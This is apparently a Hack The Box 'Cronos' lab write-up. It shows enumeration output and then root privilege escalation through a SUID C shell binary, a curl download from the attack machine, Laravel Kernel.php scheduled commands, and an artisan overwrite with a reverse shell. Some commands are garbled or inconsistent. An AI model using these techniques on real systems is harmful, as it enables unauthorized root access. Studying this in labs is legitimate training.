-rw-r--r-- 1 root root 3028 Feb 15 2017 /etc/adduser.conf
-rw-r--r-- 1 root root 92 Oct 22 2015 /etc/host.conf
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 191 Jan 19 2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 14867 Apr 12 2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 2584 Feb 18 2016 /etc/gai.conf
-rw-r--r-- 1 root root 703 May 6 2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 771 Mar 6 2015 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Mar 22 2017 /etc/kernel-img.conf


[-] Location and contents (if accessible) of .bash_history file(s):
/home/noulis/.bash_history


[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root root 820 Mar 22 2017 /var/backups/group.bak
-rw------- 1 root root 1632 Mar 22 2017 /var/backups/passwd.bak
-rw------- 1 root shadow 690 Mar 22 2017 /var/backups/gshadow.bak
-rw------- 1 root shadow 1068 Mar 22 2017 /var/backups/shadow.bak


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Feb 15 2017 .
drwxr-xr-x 14 root root 4096 Mar 22 2017 ..


### SCAN COMPLETE ####################################

schdeuled laravel owned by root

images/387-1.png

priv esc with Kernel.php

In this section we are going to take advantage of crono's laravel scheduling task through its Kernel.php program that gets periodically run by root,

laravel scheduling task

images/386-1.png



images/386-2.png

app/Console.Kernel.php is where we schedule commands!

images/386-3.png

$schedule->exec('cmd')->daily()

find app/Console/Kernel.php

we'll run a find / function and look for any files containing Kernel.php with the command

find / -name Kernel.php 2>/dev/null

images/388-1.png

Kernel.php is what we're looking for!
images/388-2.png

Kernel.php

Find Kernel.php directory and open it with vi
images/389-1.png


create a function to create ippsec file every minute in /tmp folder with
touch /tmp/ippsec
images/389-2.png


now check for ippsec fiiles on minute
images/389-3.png


Success!

images/389-4.png

setuid.c

simple setuid c program: to spawn a shell with root privileges:

int main(void)
{
setuid(0);
setgid(0);
system("bin/bash");
}

images/390-1.png


compile:
gcc getuid.c -o st0ve
images/390-2.png

no errors
images/390-3.png

CURL program to cronos

you can curl the file and output it to a file with
curl <attack_machine ip>:port/file -o savefile

images/391-1.png

give it execute capabilites with chmod +x <file> and run it with ./<file>
images/391-2.png

update Kernel.php/ change owner of setuid.c to root

since root runs the laravel kerpnel.php, we can change our setUID program to be owned by root with the following code and save it

chown root:root /dev/shm/st0ve; changes ownership of the st0ve file to root
chmod 4755 /dev/shm/st0ve turns on the functions SUID bit which allows any user to run the program with root privileges


images/392-1.png



images/392-2.png

BUT WAIT... we cannot run our getuid script from /dev/shm, so we need to move the file to the tmp folder and execute it there....

move getuid.c to tmp folder & privesc

chmod 4755 sets the UID to root, sets owner privileges to rwx, sets group to rw, and user privileges to rw
our code is also moving our binary to the /tmp folder where we can execute it


images/380-1.png
images/380-2.png

we use 4 digits because the SUID (set uid) bit can be set

protected function schedule(Schedule $schedule)
{

$schedule->exec('mv /dev/shm/st0ve /tmp/; chmod 4755 /dev/shm/st0ve')->everyminute();

}


images/380-3.png

now we see our c program with root permisisons:
images/380-4.png

root

simply run it and we escalate to root!

images/393-1.png

priv esc with artisan

we know laravel runs artisan but it runs a specific script within our laravel directory labeled artisan
images/1106-1.png

if we check who owns this file, we see that we do, even though it is run by root in the cron job
images/1106-2.png

as we see, we OWN artisan, which gives us the permission to rewrite it, so lets overwrite/hijack artisan with a php-reverse-shell back to our machine which will be run by root every time the cron is called

we can move our php-reverse-shell and save it to the same name as artisan

php-reverse-shell

lets first find our desired script on our attacking machine

images/1107-1.png

images/1107-2.png

next step is to set the parameters to connect back to our attack machine IP and a port we want to listen on
images/1107-3.png

we can download this php script to the box or save it directly there

to have cronos download it, set a simplehttpserver with python and serve the file to the box

images/1107-4.png

images/1107-5.png

images/1107-6.png

images/1107-7.png

images/1107-8.png


priv esc with kernel exploit dirty cow

another method is to transfer linux-exploit-suggester and see what types of vulnerabilities it finds

first transfer linux-exploit suggester to our victim box in the /dev/shm directory

images/1108-1.png

from this report we see dirty_cow should work which we can find visiting that link

I wasn’t able to successfully exploit Dirty COW on this machine but that doesn’t mean it’s not vulnerable. It could be vulnerable to a different variant of the exploit that I tested.

user/root

images/394-1.png
51d236438b333970dbba7dc3089be33b

images/394-2.png
1703b8a3c9a8dde879942c79d02fd3a0

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1103-1.png

images/1103-2.png